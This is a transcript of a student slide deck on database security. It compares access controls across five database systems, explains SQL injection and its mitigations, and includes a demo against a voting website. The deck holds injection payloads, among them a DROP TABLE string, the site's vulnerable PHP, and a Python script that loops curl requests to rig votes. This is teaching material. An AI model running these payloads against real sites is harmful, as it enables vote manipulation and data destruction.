.ppt
description
Transcript of .ppt
![Page 1: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/1.jpg)
Database Security
Types of attacks and mitigation strategies
Group Members:
Tushar Sugandhi
Natthapol Prakongpan
Travis Whilden
Brendan Kohlar
Jonathan Reitnauer
![Page 2: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/2.jpg)
Database Access Control
Part I
![Page 3: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/3.jpg)
Review Databases
• IBM DB2
• Oracle
• Microsoft SQL Server
• MySQL
• PostgreSQL
![Page 4: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/4.jpg)
Security Mechanisms
• Authentication– Who is allowed access to the instance and/or database– Where and how a user's password will be verified
• Authorization– The authority level that a user is granted– The commands that a user is allowed to run– The data that a user is allowed to read and/or alter– The database objects a user is allowed to create, alter,
and/or drop• Privileges
– Granular authorization
![Page 5: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/5.jpg)
IBM DB2 Authentication
– Works closely with the security features of the underlying operating system to verify user IDs and passwords.
– Can use Kerberos to authenticate users.
![Page 6: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/6.jpg)
IBM DB2 Authorization
• Determine the operations that users and/or groups can perform.
• Determine the data objects that users can access.
• Five authority levels:– SYSADM– SYSCTRL– SYSMAINT– DBADM– LOAD
![Page 7: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/7.jpg)
IBM DB2 Privileges
• More granular then authorities.
• Can be assigned to users and/or groups.
• Help define the objects that a user can create or drop.
• Help define the commands that a user can use to access objects (tables, views, indexes, packages).
![Page 8: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/8.jpg)
Oracle Security
• Authentication (Identity Management)
• Virtual Private Database
• Oracle Label Security– Row Level Authentication
![Page 9: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/9.jpg)
Oracle Identity Management
• LDAP Directory Service
• Directory integration and provision services
• Authentication and authorization services
• Certificate authority (CA)
![Page 10: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/10.jpg)
Oracle Virtual Private Database
• Allow policy to be associated with specific columns in tables.
• Relevant Column and Masking
![Page 11: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/11.jpg)
Oracle Label Security
• Provides a secure engine and data dictionary for managing access to data using sensitivity label.
• Row level security can be achieved with no programming required.
• Sensitivity labels are used to determine user’s ability to view and update data.
![Page 12: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/12.jpg)
Oracle Label Security
![Page 13: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/13.jpg)
Microsoft SQL Server
• Authentication
• Access Permission
• Roles
![Page 14: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/14.jpg)
MS SQL Authentication
• Two methods for user authentication
• Windows authentication– Default and preferred– Secure authentication with underlying
operating system
• SQL Server authentication– Strongly discourage– Not as secure (Clear text password)
![Page 15: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/15.jpg)
MS SQL Access Permission
• Statement Permissions
![Page 16: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/16.jpg)
MS SQL Access Permission
• Object Permissions
![Page 17: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/17.jpg)
MS SQL Roles
![Page 18: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/18.jpg)
![Page 19: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/19.jpg)
![Page 20: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/20.jpg)
MySQL
• Limited Security Features
• Authentication
• Permission
![Page 21: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/21.jpg)
MySQL Authentication
• User table/grant table in master database.
• Stored in plaintext.
• Can be view by anyone if not configured properly.
• No ties to OS.
• MySQL’s root has no password by default.
![Page 22: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/22.jpg)
MySQL Permission
• Table level control
• Column level control
• No row level control
![Page 23: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/23.jpg)
![Page 24: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/24.jpg)
Postgre SQL Authentication
• Trust Authentication– OS-based
• Password Authentication– md5, crypt, or password through a user table
• Kerberos Authentication– Kerberos auth. server
• Ident-based Authentication– Username, password, machine, OS.
• Pluggable Authentication Module (PAM)– Custom authentication method.
![Page 25: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/25.jpg)
Postgre SQL Permission
• Read– SELECT
• Append– INSERT
• Write– UPDATE/DELETE
• Rules– Allows a user to modify permission on a database.– Super user
![Page 26: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/26.jpg)
![Page 27: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/27.jpg)
![Page 28: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/28.jpg)
Features Comparison
DB2 Oracle MS SQL MySQL Postgre
Authentication Multiple
Good
Multiple
Good
OS
No Option
User Table
Poor
Multiple
Good
Permission Good Good Good Poor Good
Row Level View Native View View View
![Page 29: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/29.jpg)
SQL INJECTION ATTACKS
THE BASICS
Part II
![Page 30: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/30.jpg)
What is SQL Injection?
• A security vulnerability exploiting the application layer of the database
• Improperly handled user input injected into DBMS as SQL statements
![Page 31: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/31.jpg)
Where is it Done?
• Potentially any field requiring user input!– Attacking either the user handle or password in
login authentication is most commonly associated location of SQL Injection
![Page 32: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/32.jpg)
Specifically…
• SQL Injection attacks can be broken down into the exploitation of two vulnerabilities– Improper removal of escape characters– Weak type enforcement
![Page 33: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/33.jpg)
Vulnerability:Escape Characters• When escape characters used in SQL
query/command are not properly filtered from user input– Triggers an escape sequence from the current
query, such as setting a dummy value equal to itself
• The statement ‘X = X’ is always true
![Page 34: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/34.jpg)
Example: Escape Characters Exploit• Application prompts user for userName:
– statement := "SELECT * FROM users WHERE name = '" + userName + "';“
• User injects partial SQL code into prompt:– a' or 't'='t
• statement becomes:– SELECT * FROM users WHERE name = 'a' or 't'='t';
• Or condition always returns true
![Page 35: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/35.jpg)
Vulnerability:Weak Type Enforcement• When type constraints are not properly
implemented for user input– Malicious user injects a data type for input that
was not an intended value
![Page 36: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/36.jpg)
Example:Weak Type Enforcement Exploit
• Application prompts user for numeric value for row selection for following code:
– statement := "SELECT * FROM data WHERE id = " + a_variable + ";“
• User injects string statement into prompt:– 1;DROP TABLE users
• statement becomes:– SELECT * FROM data WHERE id = 1;DROP TABLE users;
• Execution deletes users table from database
![Page 37: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/37.jpg)
Protection From Attack
• Sanitize the data
• Secure the application
• Safeguard the input
• Use stored procedures
![Page 38: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/38.jpg)
Protection:Sanitize the Data• More than simply adding backslashes!
– Need a default-deny regular expression to filter through only desired characters:
• s/[^0-9a-zA-Z]//\ returns only alphanumeric values
– Strip quotation marks
![Page 39: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/39.jpg)
Protection:Secure the Application• People are the weakest link
– Limit access to only those who need it!– Set each individual’s access to lowest required
permissions
![Page 40: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/40.jpg)
Protection:Safeguard the Input• Check your database interface for input
handling functions– Proper quote handling in string parsing– Deal with backslashes accordingly
![Page 41: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/41.jpg)
Protection:Use Stored Procedures• A viable alternative…
– Resolves issues with dynamic input– Tailored to the specific needs of the database
![Page 42: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/42.jpg)
DEMO
Part III
![Page 43: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/43.jpg)
SQL Injection Demo
Attack a real website using SQL injection
![Page 44: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/44.jpg)
SQL Injection Demo
• Bestthing.info: Comparing apples to oranges and oranges to racecars.
• User-driven content with database backend
• Quest to find the “best thing ever”
• Mirror of the site at injection.pycoder.net
![Page 45: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/45.jpg)
![Page 46: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/46.jpg)
![Page 47: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/47.jpg)
Plan of attack
• Put a phrase at the top of the “Best” phrases
• Must get around the protection against duplicate ip addresses.
![Page 48: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/48.jpg)
Site CodeHTML:<form method="post" action="/"> <div> <input name="tid0" value="27356" type="hidden" /> <input name="tid1" value="35705" type="hidden" /> <input name="A" type="submit" value="Having a funny hat" /> or <input name="B" type="submit" value="Bs" /> <br /><br /> <input type="submit" name="d" value="Report this pair as a duplicate." /> </div></form>
PHP:mysql_query('INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES ('.ip2long($_SERVER['REMOTE_ADDR']).',now(),'.$_POST['tid0'].','.$_POST['tid1'].','.(isset($_POST['A'])?1:0).')');if(mysql_affected_rows()>0) { mysql_query('UPDATE thing SET votesFor=votesFor+'.$forA.', votesTotal=votesTotal+1 WHERE tid='.$o); mysql_query('UPDATE thing SET votesFor=votesFor+'.($forA?0:1).', votesTotal=votesTotal+1 WHERE tid='.$t); }
![Page 49: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/49.jpg)
Attack Code
Python Script:
#!/usr/bin/pythonimport random, commandsx = [random.randint(4000,400000)]for n in range(600): while True: p = random.randint(4000,400000) If not p in x: x.append(p) break commands.getoutput((r"curl -d tid0=%i,%i,1\)\ # -d tid1=-1\ or\”+ r“thing=\'test\' -d B=submit ”+ r“http://injection.pycoder.net" ) % (x[-2],x[-1]))
![Page 50: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/50.jpg)
![Page 51: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/51.jpg)
Thank you !!!